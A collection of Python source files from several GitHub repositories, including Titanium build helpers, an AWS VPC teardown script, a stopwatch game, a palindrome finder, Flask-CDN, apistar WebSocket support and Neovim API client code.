# Possible that not all keys were provided, so go thru orig
# dict and make sure all elements get in new, ordered dict
for key in orig_dict:
if not key in already_added:
odict[key] = orig_dict[key]
return odict
def pretty_platform_name(platform):
name = platform.lower()
if name in platform_names:
return platform_names[name]
else:
return name
def first_version_for_platform(platform):
name = platform.lower()
if name in initial_platform_version:
return initial_platform_version[name]
else:
return None
def is_platform_specific_namespace(name):
if any(map(lambda x: x in platform_namespaces, name.split("."))):
return True
return False
```
#### File: support/android/java.py
```python
import os, platform
def find_java_commands():
jarsigner = None
keytool = None
javac = None
java = None
environ_java_home = None
if os.environ.has_key("JAVA_HOME") and os.path.exists(os.environ["JAVA_HOME"]):
environ_java_home = os.environ["JAVA_HOME"]
java_home = environ_java_home
if platform.system() != "Windows":
# For Mac and Nix systems we just use the
# command name by itself.
jarsigner = "jarsigner"
keytool = "keytool"
javac = "javac"
java = "java"
else:
# Windows
if java_home:
home_jarsigner = os.path.join(java_home, "bin", "jarsigner.exe")
home_keytool = os.path.join(java_home, "bin", "keytool.exe")
home_javac = os.path.join(java_home, "bin", "javac.exe")
home_java = os.path.join(java_home, "bin", "java.exe")
if os.path.exists(home_jarsigner):
jarsigner = home_jarsigner
if os.path.exists(home_keytool):
keytool = home_keytool
if os.path.exists(home_javac):
javac = home_javac
if os.path.exists(home_java):
java = home_java
else:
for path in os.environ['PATH'].split(os.pathsep):
if os.path.exists(os.path.join(path, 'jarsigner.exe')) and os.path.exists(os.path.join(path, 'javac.exe')):
jarsigner = os.path.join(path, 'jarsigner.exe')
keytool = os.path.join(path, 'keytool.exe')
javac = os.path.join(path, 'javac.exe')
java = os.path.join(path, 'java.exe')
java_home = os.path.dirname(os.path.dirname(self.javac))
break
return {
"environ_java_home": environ_java_home,
"java_home": java_home,
"java": java,
"javac": javac,
"keytool": keytool,
"jarsigner": jarsigner
}
```
#### File: support/mobileweb/tiapp.py
```python
import os, types, uuid, codecs, time, sys
from xml.dom.minidom import parseString
ignore_nodes = ['android', 'iphone', 'deployment-targets']
def getText(nodelist):
rc = ''
for node in nodelist:
if node.nodeType == node.TEXT_NODE:
rc = rc + node.data
rc = rc.strip()
if rc.lower() in ['true', 'yes', '1']:
rc = 'true'
elif rc in ['false', 'no', '0']:
rc = 'false'
return rc
class TiAppXML(dict):
def __init__(self, xml_file, deploytype, parse_only=False):
self['analytics'] = True
self['modules'] = []
self['build'] = {}
self['properties'] = {}
self['mobileweb'] = {
'analytics': {
'use-xhr': 'false'
},
'disable-error-screen': 'false',
'filesystem': {
'backend': 'Ti/_/Filesystem/Local',
'registry': 'ondemand'
},
'map': {
'backend': 'Ti/_/Map/Google',
'apikey': ''
},
'splash': {
'enabled': 'true',
'inline-css-images': 'true'
},
'theme': 'default'
}
self['precache'] = {
'images': [],
'includes': [],
'locales': [],
'requires': []
}
self['unsupported-platforms'] = {}
dom = parseString(codecs.open(xml_file,'r','utf-8','replace').read().encode('utf-8'))
root = dom.documentElement
for child in root.childNodes:
if child.nodeType == 1 and child.nodeName not in ignore_nodes:
if child.nodeName == 'modules':
for module in child.childNodes:
if module.nodeType == 1:
platform = module.getAttribute('platform')
if platform in ['', 'mobileweb', 'commonjs']:
self['modules'].append({
'id': getText(module.childNodes),
'version': module.getAttribute('version'),
'platform': platform
})
elif child.nodeName == 'mobileweb':
for node in child.childNodes:
if node.nodeType == 1:
if node.nodeName == 'precache':
for precache_node in node.childNodes:
if precache_node.nodeType == 1:
self[node.nodeName][precache_node.nodeName + 's'].append(getText(precache_node.childNodes))
elif node.nodeName == 'build':
for build_node in node.childNodes:
if build_node.nodeType == 1 and build_node.nodeName == deploytype:
for build_param_node in build_node.childNodes:
if build_param_node.nodeType == 1:
self[node.nodeName][build_param_node.nodeName] = getText(build_param_node.childNodes)
elif node.nodeName in self['mobileweb']:
if isinstance(self['mobileweb'][node.nodeName], dict):
for subnode in node.childNodes:
if subnode.nodeType == 1:
if subnode.nodeName in self['mobileweb'][node.nodeName]:
if isinstance(self['mobileweb'][node.nodeName][subnode.nodeName], dict):
for subsubnode in subnode.childNodes:
if subsubnode.nodeType == 1:
self['mobileweb'][node.nodeName][subnode.nodeName][subsubnode.nodeName] = getText(subsubnode.childNodes)
elif isinstance(self['mobileweb'][node.nodeName][subnode.nodeName], list):
self['mobileweb'][node.nodeName][subnode.nodeName].append(getText(subnode.childNodes))
else:
self['mobileweb'][node.nodeName][subnode.nodeName] = getText(subnode.childNodes)
else:
self['mobileweb'][node.nodeName][subnode.nodeName] = getText(subnode.childNodes)
elif isinstance(self['mobileweb'][node.nodeName], list):
self['mobileweb'][node.nodeName].append(getText(node.childNodes))
else:
self['mobileweb'][node.nodeName] = getText(node.childNodes)
else:
self['mobileweb'][node.nodeName] = getText(node.childNodes)
elif child.nodeName == 'property':
self['properties'][child.getAttribute('name')] = {
'type': child.getAttribute('type') or 'string',
'value': getText(child.childNodes)
}
else:
self[child.nodeName] = getText(child.childNodes)
# ensure we create a guid if the project doesn't already have one
if not parse_only and not self.has_key('guid'):
guid = uuid.uuid4().hex
self.guid = guid
n = dom.createElement("guid")
n.appendChild(dom.createTextNode(guid))
root.appendChild(n)
root.appendChild(dom.createTextNode("\n"))
dom.writexml(codecs.open(xml_file, 'w+','utf-8','replace'), encoding="UTF-8")
```
|
{
"source": "jeffbrl/aws-lambda-reference",
"score": 2
}
|
#### File: terraform-simple/source/main.py
```python
def add(event, context):
return event['a'] + event['b']
```
|
{
"source": "jeffbrl/aws-vpc-destroy",
"score": 3
}
|
#### File: jeffbrl/aws-vpc-destroy/vpc_destroy.py
```python
import argparse
import logging
import os
import time
import sys
import boto3
from botocore.exceptions import ClientError
logger = logging.getLogger("root")
FORMAT = "[%(filename)s:%(lineno)s - %(funcName)20s() ] %(message)s"
logging.basicConfig(format=FORMAT, level=logging.INFO)
def destroy_ec2(vpc_id, aws_region):
logger.debug(f"{vpc_id}")
ec2 = boto3.resource("ec2", region_name=aws_region)
ec2client = ec2.meta.client
# test for valid credentials
try:
ec2client.describe_vpcs()
except ClientError as e:
logging.info(e)
print(
"Either your credentials are invalid or your IAM user doesn't have permissions to list VPCs"
)
sys.exit(1)
if not vpc_exists(ec2client, vpc_id):
print(f"VPC {vpc_id} does not exist in {aws_region}")
return
vpc = ec2.Vpc(vpc_id)
# disassociate EIPs and release EIPs from EC2 instances
for subnet in vpc.subnets.all():
for instance in subnet.instances.all():
filters = [{"Name": "instance-id", "Values": [instance.id]}]
eips = ec2client.describe_addresses(Filters=filters)["Addresses"]
for eip in eips:
ec2client.disassociate_address(AssociationId=eip["AssociationId"])
ec2client.release_address(AllocationId=eip["AllocationId"])
# delete instances
filters = [
{"Name": "instance-state-name", "Values": ["running"]},
{"Name": "vpc-id", "Values": [vpc_id]},
]
ec2_instances = ec2client.describe_instances(Filters=filters)
instance_ids = []
for reservation in ec2_instances["Reservations"]:
instance_ids += [
instance["InstanceId"] for instance in reservation["Instances"]
]
logger.info(f"instance deletion list: {instance_ids}")
if instance_ids:
logging.info("Waiting for instances to terminate")
waiter = ec2client.get_waiter("instance_terminated")
ec2client.terminate_instances(InstanceIds=instance_ids)
waiter.wait(InstanceIds=instance_ids)
def destroy_services(vpc_id, aws_region, services):
services_map = {"ec2": destroy_ec2}
for service in services.split(","):
try:
services_map[service](vpc_id, aws_region)
except KeyError:
logger.error(f"destroying {service} not implemented")
def vpc_exists(ec2client, vpc_id):
try:
ec2client.describe_vpcs(VpcIds=[vpc_id])
except ClientError as e:
logging.info(e)
return False
return True
def delete_vpc(vpc_id, aws_region, release_eips=False):
ec2 = boto3.resource("ec2", region_name=aws_region)
ec2client = ec2.meta.client
if not vpc_exists(ec2client, vpc_id):
print(f"VPC {vpc_id} does not exist in {aws_region}")
return False
# Exit cleanly if user did to specify at command line to delete EC2 instances for
# a VPC with runnining instances
filters = [
{"Name": "instance-state-name", "Values": ["running"]},
{"Name": "vpc-id", "Values": [vpc_id]},
]
if ec2client.describe_instances(Filters=filters)["Reservations"]:
print(
f"Running EC2 instances exist in {vpc_id}. Please use --services ec2 to invoke the program."
)
return False
vpc = ec2.Vpc(vpc_id)
# delete transit gateway attachment for this vpc
# note - this only handles vpc attachments, not vpn
for attachment in ec2client.describe_transit_gateway_attachments()[
"TransitGatewayAttachments"
]:
if attachment["ResourceId"] == vpc_id:
ec2client.delete_transit_gateway_vpc_attachment(
TransitGatewayAttachmentId=attachment["TransitGatewayAttachmentId"]
)
# delete NAT Gateways
# attached ENIs are automatically deleted
# EIPs are disassociated but not released
filters = [{"Name": "vpc-id", "Values": [vpc_id]}]
for nat_gateway in ec2client.describe_nat_gateways(Filters=filters)["NatGateways"]:
ec2client.delete_nat_gateway(NatGatewayId=nat_gateway["NatGatewayId"])
# detach default dhcp_options if associated with the vpc
dhcp_options_default = ec2.DhcpOptions("default")
if dhcp_options_default:
dhcp_options_default.associate_with_vpc(VpcId=vpc.id)
# delete any vpc peering connections
for vpc_peer in ec2client.describe_vpc_peering_connections()[
"VpcPeeringConnections"
]:
if vpc_peer["AccepterVpcInfo"]["VpcId"] == vpc_id:
ec2.VpcPeeringConnection(vpc_peer["VpcPeeringConnectionId"]).delete()
if vpc_peer["RequesterVpcInfo"]["VpcId"] == vpc_id:
ec2.VpcPeeringConnection(vpc_peer["VpcPeeringConnectionId"]).delete()
# delete our endpoints
for ep in ec2client.describe_vpc_endpoints(
Filters=[{"Name": "vpc-id", "Values": [vpc_id]}]
)["VpcEndpoints"]:
ec2client.delete_vpc_endpoints(VpcEndpointIds=[ep["VpcEndpointId"]])
# delete custom security groups
for sg in vpc.security_groups.all():
if sg.group_name != "default":
sg.delete()
# delete custom NACLs
for netacl in vpc.network_acls.all():
if not netacl.is_default:
netacl.delete()
# ensure ENIs are deleted before proceding
timeout = time.time() + 300
filter = [{"Name": "vpc-id", "Values": [vpc_id]}]
logger.debug(f"proceed with deleting ENIs")
reached_timeout = True
while time.time() < timeout:
if not ec2client.describe_network_interfaces(Filters=filters)[
"NetworkInterfaces"
]:
logger.info(f"no ENIs remaining")
reached_timeout = False
break
else:
logger.info(f"waiting on ENIs to delete")
time.sleep(30)
if reached_timeout:
logger.debug(f"ENI deletion timed out")
# delete subnets
for subnet in vpc.subnets.all():
for interface in subnet.network_interfaces.all():
interface.delete()
subnet.delete()
# Delete routes, associations, and routing tables
filter = [{"Name": "vpc-id", "Values": [vpc_id]}]
route_tables = ec2client.describe_route_tables(Filters=filter)["RouteTables"]
for route_table in route_tables:
for route in route_table["Routes"]:
if route["Origin"] == "CreateRoute":
ec2client.delete_route(
RouteTableId=route_table["RouteTableId"],
DestinationCidrBlock=route["DestinationCidrBlock"],
)
for association in route_table["Associations"]:
if not association["Main"]:
ec2client.disassociate_route_table(
AssociationId=association["RouteTableAssociationId"]
)
ec2client.delete_route_table(
RouteTableId=route_table["RouteTableId"]
)
# delete routing tables without associations
for route_table in route_tables:
if route_table["Associations"] == []:
ec2client.delete_route_table(RouteTableId=route_table["RouteTableId"])
# destroy NAT gateways
filters = [{"Name": "vpc-id", "Values": [vpc_id]}]
nat_gateway_ids = [
nat_gateway["NatGatewayId"]
for nat_gateway in ec2client.describe_nat_gateways(Filters=filters)[
"NatGateways"
]
]
for nat_gateway_id in nat_gateway_ids:
ec2client.delete_nat_gateway(NatGatewayId=nat_gateway_id)
# detach and delete all IGWs associated with the vpc
for gw in vpc.internet_gateways.all():
vpc.detach_internet_gateway(InternetGatewayId=gw.id)
gw.delete()
ec2client.delete_vpc(VpcId=vpc_id)
return True
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser._action_groups.pop()
required = parser.add_argument_group("required arguments")
optional = parser.add_argument_group("optional arguments")
required.add_argument("--vpc_id", required=True, help="Please include your vpc_id")
optional.add_argument(
"--services", help="comma-separated list of AWS services to tear down"
)
optional.add_argument("--region", help="AWS region")
args = parser.parse_args()
if args.region:
aws_region = args.region
else:
aws_region = os.environ["AWS_DEFAULT_REGION"]
vpc_id = args.vpc_id
print(f"type: {type(vpc_id)}")
if args.services:
logger.info(f"calling destroy_services with {args.services}")
destroy_services(args.vpc_id, aws_region, args.services)
logger.info(f"calling delete_vpc with {vpc_id}")
if delete_vpc(vpc_id=vpc_id, aws_region=aws_region, release_eips=False):
print(f"destroyed {vpc_id} in {aws_region}")
else:
print(f"unable to destroy {vpc_id} in {aws_region}")
```
|
{
"source": "jeffbrl/terraform-examples",
"score": 2
}
|
#### File: terraform-examples/lambda-vpc/lambda.py
```python
def lambda_handler(event, context):
print("Hello from Lambda")
```
|
{
"source": "jeffbrown3340/python-stopwatch",
"score": 3
}
|
#### File: jeffbrown3340/python-stopwatch/stopwatch-completed.py
```python
import simplegui
import math
import time
# define global variables
t = 0
status_message_xpos = 35
status_message = ""
points = 0
tries = 0
max_tries = 5
# define helper function format that converts time
# in tenths of seconds into formatted string A:BC.D
def format(t):
# t is count of tenths of seconds
# calculate remainder tenths, which is the ones position
tenths = t % 10
# take away the tenths, divide by tenths per minute (10*60) rounded down
# coercing to int for display purposes in the string build
minutes = int(math.floor((t - tenths)/(10 * 60)))
# take away minutes and tenths, remainder is secs * 10 centisec/sec
seconds = int((t - (minutes * 60 * 10) - tenths) / 10)
# build the returned string from right to left
string_to_return = "." + str(tenths) #decimal point and tenths
string_to_return = str(seconds) + string_to_return #seconds
if seconds < 10:
string_to_return = "0" + string_to_return # pad zero to single digit
string_to_return = ":" + string_to_return
string_to_return = str(minutes) + string_to_return
return string_to_return
# define event handlers for buttons; "Start", "Stop", "Reset"
def start_button():
global t, status_message, status_message_xpos
if tries >= max_tries:
status_message_xpos = 65
status_message = "Game over, hit Reset."
else:
timer.start()
status_message = ""
def stop_button():
global t, tries, points, status_message, status_message_xpos
if timer.is_running():
timer.stop()
tries += 1
status_message_xpos = 75
if t % 10 == 0:
points += 1
status_message = "You scored a point!"
else:
if tries >= max_tries:
status_message_xpos = 30
status_message = "Oops! Game over, hit Reset."
else:
status_message_xpos = 75
status_message = "Oops ... try Again."
def reset_button():
global t, tries, points, status_message
timer.stop()
t = 0
tries = 0
points = 0
status_message = ""
# define event handler for timer with 0.1 sec interval
def timer_event_handler():
global t
t += 1
# reset to zero after 9:59.9
if t > (10 * 60 * 10) - 1:
t = 0
# define draw handler
def draw_handler(canvas):
canvas.draw_text(str(points) + "/" + str(tries), [250,25], 24, "Yellow")
canvas.draw_text(format(t), [100,112], 48, "White")
canvas.draw_text(status_message, [status_message_xpos,190], 24, "Red")
# create frame
frame = simplegui.create_frame("Stopwatch", 325, 200)
timer = simplegui.create_timer(100, timer_event_handler)
# register event handlers
frame.set_draw_handler(draw_handler)
frame.add_button("Start",start_button)
frame.add_button("Stop",stop_button)
frame.add_button("Reset",reset_button)
# start frame
frame.start()
```
|
{
"source": "jeff-brown/next",
"score": 4
}
|
#### File: jeff-brown/next/next.py
```python
import sys
def next_palindrome(num):
"""
function to figure out the next palindrome given any starting value
args:
num(int): the starting number
returns:
the next palindrome
"""
length = len(str(num))
odd_digits = (length % 2 != 0)
left_half = get_left_half(num)
middle = get_middle(num)
if odd_digits:
increment = pow(10, length / 2)
new_num = int(left_half + middle + left_half[::-1])
else:
increment = int(1.1 * pow(10, length / 2))
new_num = int(left_half + left_half[::-1])
if new_num > num:
return new_num
if middle != '9':
return new_num + increment
return next_palindrome(round_up(num))
def get_left_half(num):
"""
function to get the left half of a string representation of a starting
numerical value.
"""
return str(num)[:len(str(num))/2]
def get_middle(num):
"""
function to get the middle of a string representation of a starting
numberical value
"""
# (len(str(num)) - 1) / 2
return str(num)[int((len(str(num)) - 1) / 2)]
def round_up(num):
"""
round up the starting value to the nearest whole number ending in zero
"""
length = len(str(num))
increment = pow(10, ((length / 2) + 1))
return ((num / increment) + 1) * increment
def main():
"""
the main function calls the next_palindrome function and prints the result
"""
num = int(sys.argv[1])
palindrome = next_palindrome(num)
print(
"With a starting value of {}, the next palindrome is {}.".format(
num, palindrome
)
)
return 0
if __name__ == '__main__':
sys.exit(main())
```
|
{
"source": "jeffbulmer/team-formation-script",
"score": 2
}
|
#### File: jeffbulmer/team-formation-script/fetch_data.py
```python
import canvasapi
import click
from team_formation import config
from team_formation.data_helpers import process_canvas_course, process_canvas_sections, \
process_canvas_students
from team_formation.prompts import course_prompt
@click.command()
@click.option('--store_data',
default=False,
is_flag=True,
help='Store data fetched into `.csv` files. [default: False]',
envvar='CANVAS_STORE_DATA_LOCALLY')
@click.option('--course_id',
help='Canvas Course ID.',
type=int,
envvar='CANVAS_COURSE_ID')
@click.option('--token',
prompt=False,
default=config.TOKEN,
hide_input=True,
help='Canvas API token.',
required=True,
envvar='CANVAS_API_TOKEN')
@click.option('--url',
default='https://canvas.ubc.ca',
# default='https://ubc.test.instructure.com',
help='Canvas Url. [default: https://canvas.ubc.ca]',
# help='Canvas Url. [default: https://ubc.test.instructure.com]',
required=True,
envvar='CANVAS_BASE_URL')
def fetch_data(url, token, course_id, store_data):
config.STORE_DATA_LOCALLY = store_data
_fetch_data(url, token, course_id)
def _fetch_data(url, token, course_id):
canvas = canvasapi.Canvas(url, token)
data = {}
if not course_id:
# prompt user to select a course they have access to (paginated)
course_id = course_prompt(canvas)
# get course by id
course = canvas.get_course(course_id, include=['total_students'])
data['course_df'] = process_canvas_course(course)
sections = course.get_sections(include=['students'], per_page=config.PER_PAGE)
data['sections_df'] = process_canvas_sections(sections)
students = course.get_users(enrollment_type=['student'], enrollment_stat=['active'], per_page=config.PER_PAGE)
data['students_df'] = process_canvas_students(students)
modules = course.get_modules()
for module in modules:
module_items =module.get_module_items()
module_items = [module_item for module_item in module_items]
for mi in module_items:
print(mi)
return (course, data)
def fetch_student_survey_data(course, student_id, quiz_id):
survey = course.get_quiz(quiz_id)
students = course.get_users(enrollment_state=['active']);
student = None;
for s in students:
if(s.id == student_id):
student = s;
break
submissions = survey.get_submissions()
submission = None
for x in submissions:
if(x.user_id == student_id):
submission = x
break;
q_data=[]
if(submission is None):
return None
for y in submission.get_submission_events():
if(y.event_type == 'question_answered'):
q_data += y.event_data
read_data = [];
for z in q_data:
# print(z);
q = survey.get_question(int(z['quiz_question_id'])).question_text
for a in survey.get_question(int(z['quiz_question_id'])).answers:
#handle multiple dropdowns separately
if type(z['answer']) is dict:
for e in z['answer']:
if z['answer'][e] is None:
continue;
elif z['answer'] is not None and a['id'] == int(z['answer']):
# print({'Question':q,'Answer':a['text']})
read_data.append({'Question':q,'Answer':a['text']});
break;
if(student is None):
name = "Test"
else:
name = student.name
return {'student_name':name, 'quiz':survey.title, 'answers': read_data}
# def fetch_all_survey_data(course, quiz_id):
if __name__ == '__main__':
fetch_data()
```
|
{
"source": "jeffbuswell/flask-cdn",
"score": 3
}
|
#### File: jeffbuswell/flask-cdn/flask_cdn.py
```python
import os
from flask import url_for as flask_url_for
from flask import current_app, request
def url_for(endpoint, **values):
"""
Generates a URL to the given endpoint.
If the endpoint is for a static resource then a URL to the CDN is
generated, otherwise the call is passed on to `flask.url_for`.
Because this function is set as a jinja environment variable when
`CDN.init_app` is invoked, this function replaces `flask.url_for` in
templates automatically. It is unlikely that this function will need to be
directly called from within your application code, unless you need to refer
to static assets outside of your templates.
"""
app = current_app
if app.config['CDN_DEBUG']:
return flask_url_for(endpoint, **values)
def endpoint_match(endpoint):
if endpoint in app.config['CDN_ENDPOINTS']:
return True
for x in app.config['CDN_ENDPOINTS']:
if endpoint.endswith('.%s' % x):
return True
return False
if endpoint_match(endpoint):
try:
scheme = values.pop('_scheme')
except KeyError:
scheme = 'http'
cdn_https = app.config['CDN_HTTPS']
if cdn_https is True or (cdn_https is None and request.is_secure):
scheme = 'https'
static_folder = app.static_folder
if (request.blueprint is not None and
request.blueprint in app.blueprints and
app.blueprints[request.blueprint].has_static_folder):
static_folder = app.blueprints[request.blueprint].static_folder
urls = app.url_map.bind(app.config['CDN_DOMAIN'], url_scheme=scheme)
if app.config['CDN_TIMESTAMP']:
path = os.path.join(static_folder, values['filename'])
values['t'] = int(os.path.getmtime(path))
values['v'] = app.config['CDN_VERSION']
return urls.build(endpoint, values=values, force_external=True)
return flask_url_for(endpoint, **values)
class CDN(object):
"""
The CDN object allows your application to use Flask-CDN.
When initialising a CDN object you may optionally provide your
:class:`flask.Flask` application object if it is ready. Otherwise,
you may provide it later by using the :meth:`init_app` method.
:param app: optional :class:`flask.Flask` application object
:type app: :class:`flask.Flask` or None
"""
def __init__(self, app=None):
"""
An alternative way to pass your :class:`flask.Flask` application
object to Flask-CDN. :meth:`init_app` also takes care of some
default `settings`_.
:param app: the :class:`flask.Flask` application object.
"""
self.app = app
if app is not None:
self.init_app(app)
def init_app(self, app):
defaults = [('CDN_DEBUG', app.debug),
('CDN_DOMAIN', None),
('CDN_HTTPS', None),
('CDN_TIMESTAMP', True),
('CDN_VERSION', None),
('CDN_ENDPOINTS', ['static'])]
for k, v in defaults:
app.config.setdefault(k, v)
if app.config['CDN_DOMAIN']:
app.jinja_env.globals['url_for'] = url_for
```
|
{
"source": "jeffbuttars/apistar-autoapp",
"score": 3
}
|
#### File: apistar-autoapp/tests/test_list_apps.py
```python
import os
from apistar_autoapp.autoapp import list_apps
cur_dir = os.path.realpath(os.path.dirname(__file__))
def test_list_apps_top():
res = list_apps(cur_dir)
assert res
assert set(res) == set(('v1', 'v2'))
def test_list_apps_v1():
res = list_apps(os.path.join(cur_dir, 'v1'))
assert res
assert set(res) == set(('epone', 'eptwo', 'epthree', 'deep'))
def test_list_apps_v2():
res = list_apps(os.path.join(cur_dir, 'v2'))
assert res
assert set(res) == set(('epone', 'eptwo', 'epthree'))
def test_list_apps_v1_deep():
res = list_apps(os.path.join(cur_dir, 'v1', 'deep'))
assert res
assert set(res) == set(('one', 'two'))
```
|
{
"source": "jeffbuttars/apistar-websocket",
"score": 2
}
|
#### File: apistar-websocket/apistar_websocket/websocket.py
```python
import logging
import typing
from enum import Enum
import websockets
from apistar import App
from apistar.exceptions import HTTPException
from apistar.http import Response
from apistar.server.asgi import ASGIReceive, ASGIScope, ASGISend
from apistar.server.components import Component
logger = logging.getLogger(__name__)
class Status(Enum):
# 1000 indicates a normal closure, meaning that the purpose for
# which the connection was established has been fulfilled.
OK = 1000
# 1001 indicates that an endpoint is "going away", such as a server
# going down or a browser having navigated away from a page.
LEAVING = 1001
# 1002 indicates that an endpoint is terminating the connection due
# to a protocol error.
PROT_ERROR = 1002
# 1003 indicates that an endpoint is terminating the connection
# because it has received a type of data it cannot accept (e.g., an
# endpoint that understands only text data MAY send this if it
# receives a binary message).
UNSUPPORTED_TYPE = 1003
# Reserved. The specific meaning might be defined in the future.
RESERVED_1004 = 1004
# 1005 is a reserved value and MUST NOT be set as a status code in a
# Close control frame by an endpoint. It is designated for use in
# applications expecting a status code to indicate that no status
# code was actually present.
NO_STATUS = 1005
# 1006 is a reserved value and MUST NOT be set as a status code in a
# Close control frame by an endpoint. It is designated for use in
# applications expecting a status code to indicate that the
# connection was closed abnormally, e.g., without sending or
# receiving a Close control frame.
CLOSED_ABNORMAL = 1006
# 1007 indicates that an endpoint is terminating the connection
# because it has received data within a message that was not
# consistent with the type of the message (e.g., non-UTF-8 [RFC3629]
# data within a text message).
INALID_DATA = 1007
# 1008 indicates that an endpoint is terminating the connection
# because it has received a message that violates its policy. This
# is a generic status code that can be returned when there is no
# other more suitable status code (e.g., 1003 or 1009) or if there
# is a need to hide specific details about the policy.
POLICY_VIOLATION = 1008
# 1009 indicates that an endpoint is terminating the connection
# because it has received a message that is too big for it to
# process.
TOO_BIG = 1009
# 1010 indicates that an endpoint (client) is terminating the
# connection because it has expected the server to negotiate one or
# more extension, but the server didn't return them in the response
# message of the WebSocket handshake. The list of extensions that
TLS_FAIL = 1010
class WebSocketClosed(HTTPException):
def __init__(self,
detail: str = 'WebSocket has closed',
status_code: int = Status.OK.value) -> None:
super().__init__(detail, 200)
# def get_headers(self):
# return {
# }
class WebSocketProtocolError(HTTPException):
def __init__(self,
detail: str = 'WebSocket protocol error',
status_code: int = Status.PROT_ERROR.value) -> None:
super().__init__(detail, status_code)
class WebSocket(object):
"""
Basic WebSocket wrapper for APIStar, though this one is specific to Uvicorn.
This only works with ASGI and on a standalone route the manages connecting and closing
the WebSocket. The WebSocketAutoHook can connect/close the connection before and after
the handler but ASyncApp::asgi_finalize must be able to handle the websocket type
correctly and not try to send an HTTP response.
Something like this in ASyncApp::asgi_finalize can allow for cleaner WebSocket usage.
# Process exceptions
if scope.get('type') == 'websocket':
return
# Process HTTP Response
"""
def __init__(self,
asgi_scope: dict,
asgi_send: typing.Callable,
asgi_receive: typing.Callable,
) -> None:
self.scope = asgi_scope
self.asgi_send = asgi_send
self.asgi_receive = asgi_receive
# UVicorn specific, get the WebSocketRequest instance
# This will blow up under the debug server, so we'll fake it, I guess?
try:
self._ws_request = asgi_send.__self__
except AttributeError as e:
logger.error("Unable to get a reference to underlying Uvicorn websocket instance")
self._ws_request = None
@property
def state(self):
if hasattr(self._ws_request, 'state'):
return self._ws_request.state
return self._ws_request.protocol.state
@property
def is_open(self):
return self.state is websockets.protocol.State.OPEN
async def send(self, data=None, **kwargs):
msg = {
'type': 'websocket.send',
}
msg.update(kwargs)
if data:
if isinstance(data, str):
msg['text'] = data
elif isinstance(data, bytes):
msg['bytes'] = data
return await self.asgi_send(msg)
async def receive(self):
msg = await self.asgi_receive()
return msg.get('text', msg.get('bytes'))
async def connect(self):
# Try to accept and upgrade the websocket
msg = await self.asgi_receive()
if msg['type'] != 'websocket.connect':
raise WebSocketProtocolError(
'Expected websocket connection but got: %s' % msg['type'])
await self.asgi_send({'type': 'websocket.accept'})
async def close(self, code: int = Status.OK.value, data=None):
message = {
'type': 'websocket.disconnect',
'code': code,
}
if data:
if isinstance(data, str):
message['text'] = data
elif isinstance(data, bytes):
message['bytes'] = data
await self.asgi_send(message)
class WebSocketAutoHook():
"""
Automatically connect the websocket on request.
Automatically close the websocket after it's handled
NOTE: This hook only works if AsyncApp::asgi_finalize supports the webhook type
and doesn't send HTTP Response data when a WebSocket is finished.
"""
async def on_request(self, ws: WebSocket):
if ws.scope.get('type') == 'websocket':
await ws.connect()
async def on_response(self, ws: WebSocket, response: Response, scope: ASGIScope):
if ws.scope.get('type') == 'websocket':
if ws.is_open:
scope['raise_exceptions'] = True
await ws.close(data=response.content if response else None)
# Go for the inner exception by always raising for websocket
raise WebSocketClosed()
async def on_error(self, ws: WebSocket, response: Response):
if ws.scope.get('type') == 'websocket':
if ws.is_open:
await ws.close(data=response.content if response else None)
raise WebSocketClosed()
class WebSocketComponent(Component):
def resolve(self,
scope: ASGIScope,
send: ASGISend,
receive: ASGIReceive) -> WebSocket:
return WebSocket(scope, send, receive)
```
|
{
"source": "jeffbuttars/jb-nvim",
"score": 2
}
|
#### File: jb-nvim/client/apigen.py
```python
import builtins
import subprocess
import tempfile
import keyword
import msgpack
from pprint import pformat as pf
def convert(x):
if isinstance(x, bytes):
return x.decode('utf-8')
return x
def kword(kw):
if kw in keyword.kwlist or kw in dir(builtins):
return 'v_' + kw
return kw
def print_func(func):
fmt = (
" # Function: {name}\n"
" # Parameters {parameters}\n"
" # Returns {return_type}\n"
" # Recieves channel id {receives_channel_id}\n"
" # Can fail {can_fail}\n"
" def {func_name}(self, {args}):\n"
" return self.send_sync(ReqMsg('{name}', *[{args}]))\n"
)
func['receives_channel_id'] = func.get('receives_channel_id', False)
func['can_fail'] = func.get('can_fail', False)
func['args'] = ', '.join([kword(x[1]) for x in func.get('parameters', [])])
func['parameters'] = ', '.join(
[x[0] + ': ' + x[1] for x in func.get('parameters', [])])
print(fmt.format(**func))
def print_cls(cls, funcs):
fmt = (
"\nclass {}(Cmd):\n\n"
" def __init__(self, session):\n"
" self._session = session\n"
)
print(fmt.format(cls))
for func in funcs:
print_func(func)
def parse_funcs(funcs):
cls_map = {}
for func in funcs:
fn = func['name']
cls, name = fn.split('_', 1)
cls = cls.title()
func['func_name'] = name
if cls not in cls_map:
cls_map[cls] = []
cls_map[cls].append(func)
for k, v in cls_map.items():
print_cls(k, v)
print("function_classes = {")
for k in cls_map:
print(" '{}': {},".format(k.lower(), k))
print("}\n")
def main():
try:
fd = tempfile.TemporaryFile()
with subprocess.Popen(['nvim', '--api-info'], stdout=subprocess.PIPE) as proc:
fd.write(proc.stdout.read())
except subprocess.CalledProcessError:
print("Error running nvim --api-info")
raise
fd.seek(0)
func_info = msgpack.unpackb(
fd.read(), encoding='utf-8',
object_hook=lambda obj: {convert(k): convert(v) for k, v in obj.items()},
list_hook=lambda item: [convert(x) for x in item],
)
# print("api_info =", pf(func_info))
print("from msg import ReqMsg")
print("from cmds import Cmd\n")
parse_funcs(func_info['functions'])
if __name__ == '__main__':
main()
```
#### File: jb-nvim/client/nvim_funcs.py
```python
from msg import ReqMsg
from cmds import Cmd
class Window(Cmd):
def __init__(self, session):
self._session = session
# Function: window_get_buffer
# Parameters Window: window
# Returns Buffer
# Recieves channel id False
# Can fail True
def get_buffer(self, window):
return self.send_sync(ReqMsg('window_get_buffer', *[window]))
# Function: window_get_cursor
# Parameters Window: window
# Returns ArrayOf(Integer, 2)
# Recieves channel id False
# Can fail True
def get_cursor(self, window):
return self.send_sync(ReqMsg('window_get_cursor', *[window]))
# Function: window_set_cursor
# Parameters Window: window, ArrayOf(Integer, 2): pos
# Returns void
# Recieves channel id False
# Can fail True
def set_cursor(self, window, pos):
return self.send_sync(ReqMsg('window_set_cursor', *[window, pos]))
# Function: window_get_height
# Parameters Window: window
# Returns Integer
# Recieves channel id False
# Can fail True
def get_height(self, window):
return self.send_sync(ReqMsg('window_get_height', *[window]))
# Function: window_set_height
# Parameters Window: window, Integer: height
# Returns void
# Recieves channel id False
# Can fail True
def set_height(self, window, height):
return self.send_sync(ReqMsg('window_set_height', *[window, height]))
